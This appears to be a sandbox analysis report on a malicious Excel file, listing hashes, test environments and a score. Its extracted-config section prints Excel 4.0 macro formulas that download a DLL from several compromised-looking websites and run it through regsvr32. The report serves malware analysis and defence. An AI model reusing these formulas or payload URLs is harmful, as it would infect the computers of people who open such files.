General
-
Target
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562
-
Size
18KB
-
Sample
240909-1tmylascpk
-
MD5
8762ebe9984b59c40d367382f168e840
-
SHA1
efe05b3e0184dda4f69be941c13b11ad0219b354
-
SHA256
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562
-
SHA512
131d069291c8b3433e7b61971684e0209ee5e6da87e7678ce6827050768c96d00121f1f94842b88fd42bdb3856d069845f34a53e65b99a89e54c5465594a1ab0
-
SSDEEP
384:uCJj6woT13+oZ7lI+IKeVBZqt7crLqp77x5qZghI0qAztDM/:uC93oxrZ72+/ecmqp7q2hI0rt2
Static task
static1
Behavioral task
behavioral1
Sample
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/","..\kytk.dll",0,0)
=IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/","..\kytk.dll",0,0))
=IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cafe-kwebbel.nl/layouts/3Wkev/","..\kytk.dll",0,0))
=IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/","..\kytk.dll",0,0))
=IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://borbajardinagem.com.br/erros/vlB3f6XpsZG/","..\kytk.dll",0,0))
=IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/","..\kytk.dll",0,0))
=IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/","..\kytk.dll",0,0))
=IF('SCWVCV'!D26<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
=RETURN()
Targets
Target
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562
Score
3/10